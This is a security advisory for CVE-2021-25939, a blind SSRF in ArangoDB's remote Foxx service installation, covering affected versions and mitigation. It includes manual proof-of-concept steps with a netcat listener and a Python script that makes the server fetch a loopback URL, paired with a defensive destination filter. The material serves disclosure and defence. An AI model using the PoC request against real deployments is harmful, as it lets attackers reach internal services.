CVE-2021-25939
Date: February 9, 2022
Overview
In ArangoDB, versions v3.7.0 through v3.9.0-alpha.1 have a feature which allows downloading a Foxx service from a publicly available URL. This feature does not properly filter the requests it performs internally on the caller's behalf, which a highly privileged (authenticated) attacker can abuse to perform blind SSRF and make the database server send requests to services listening on localhost.
Details
ArangoDB is a native multi-model database with flexible data models for documents, graphs, and key-values. Affected versions are vulnerable to blind SSRF because the feature that installs Foxx services from a publicly available URL does not filter the destination of the request the server makes to fetch the service. An authenticated attacker with the privileges needed to install services can use it to make the database server send requests to localhost. Note: ArangoDB 3.8.5 and later are still vulnerable by default, but the remote-install feature can be disabled with a startup option; for further information, see this comment: https://github.com/arangodb/arangodb/pull/15344#issue-1079754008
PoC Details
For demonstration purposes, open a netcat listener on the machine where ArangoDB is installed; it stands in for a service that is reachable only locally. Log in as a highly privileged user, go to Services, choose Remote, and enter the server's own URL with the open netcat port as the service URL. Set the mount point to mnt/hello.
On the netcat listener's terminal, the request arrives: it was issued by the database server itself, from inside the host, not by the attacker's browser.
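The same check, driven over the Foxx HTTP API instead of the web UI, together with the kind of destination filter the remote-install feature was missing. This is an added example, not ArangoDB's code or the original PoC. It assumes the install endpoint is `POST /_api/foxx?mount=...` taking a JSON body `{"source": "<url>"}` with HTTP basic auth, that a listener such as `nc -l 4444` is running on the database host, and the `BASE_URL` / credential values are placeholders to replace.

```python
"""Added example for CVE-2021-25939 (not ArangoDB project code).

Assumptions (not from the advisory): the Foxx install endpoint is
POST /_api/foxx?mount=<mount> with JSON body {"source": "<url>"} and HTTP
basic auth; a listener such as `nc -l 4444` runs on the database host.
"""
import base64
import ipaddress
import json
import socket
from urllib.parse import urlsplit
from urllib.request import Request, urlopen

BASE_URL = "http://arangodb.example:8529"      # placeholder: database endpoint
LISTENER = "http://127.0.0.1:4444/hello.zip"   # loopback URL the *server* will fetch


def foxx_install_request(base_url, mount, source, user="root", password=""):
    """Build the request the 'Services > Remote' dialog sends (assumed API shape).

    The interesting part is `source`: the server fetches it itself, so a
    loopback or internal address reaches services the attacker cannot.
    """
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return Request(
        f"{base_url}/_api/foxx?mount={mount}",
        data=json.dumps({"source": source}).encode(),
        headers={"Content-Type": "application/json",
                 "Authorization": f"Basic {token}"},
        method="POST",
    )


def is_safe_remote_source(url):
    """Destination filter a remote-install feature should apply before fetching.

    Accepts only http(s) URLs whose host is a literal public address or a name
    that resolves *exclusively* to public addresses; loopback, link-local,
    private and reserved ranges are rejected for every resolved address.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    host = parts.hostname
    if host.lower() == "localhost":
        return False
    try:
        addrs = {ipaddress.ip_address(host)}       # literal IP, no DNS needed
    except ValueError:
        try:
            infos = socket.getaddrinfo(host, None)
        except socket.gaierror:
            return False                           # unresolvable: do not fetch
        addrs = {ipaddress.ip_address(info[4][0]) for info in infos}
    # Every address must be public; one internal A/AAAA record is enough to reject
    # (guards against multi-record answers pointing at internal hosts).
    return all(a.is_global and not a.is_multicast for a in addrs)


if __name__ == "__main__":
    # Live reproduction against a test instance: watch the nc terminal for the GET.
    print("filter verdict for listener URL:", is_safe_remote_source(LISTENER))  # False
    try:
        with urlopen(foxx_install_request(BASE_URL, "/hello", LISTENER), timeout=10) as r:
            print("server responded", r.status)
    except Exception as exc:
        # The install itself fails (the listener does not serve a zip), but the
        # server-side fetch has already happened, which is the whole finding.
        print("install call failed, as expected:", exc)
```

Running the script against a patched 3.8.5+ instance with `--foxx.allow-install-from-remote false` should produce a refusal before any fetch; on an affected instance the netcat terminal shows the request regardless of what the API returns.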
Affected Environments
All versions of ArangoDB 3.7; all versions of ArangoDB 3.8 (from 3.8.5 onward the issue can be mitigated in the startup configuration); ArangoDB 3.9 prior to v3.9.0-beta.1
Prevention
If you are using ArangoDB 3.8 or earlier: upgrade to ArangoDB 3.8.5 or later and disable the `--foxx.allow-install-from-remote` startup option. The upgrade alone does not change the default, so without this setting the deployment remains vulnerable. If you are using ArangoDB 3.9: upgrade to 3.9.0-beta.1 or later.
Language: C
Good to know:

CVSS v3 metrics

| Metric | Value |
|---|---|
| Base Score | |
| Attack Vector (AV) | Network |
| Attack Complexity (AC) | Low |
| Privileges Required (PR) | High |
| User Interaction (UI) | None |
| Scope (S) | Unchanged |
| Confidentiality (C) | None |
| Integrity (I) | Low |
| Availability (A) | None |

CVSS v2 metrics

| Metric | Value |
|---|---|
| Base Score | |
| Access Vector (AV) | Network |
| Access Complexity (AC) | Low |
| Authentication (AU) | Single |
| Confidentiality (C) | None |
| Integrity (I) | Partial |
| Availability (A) | None |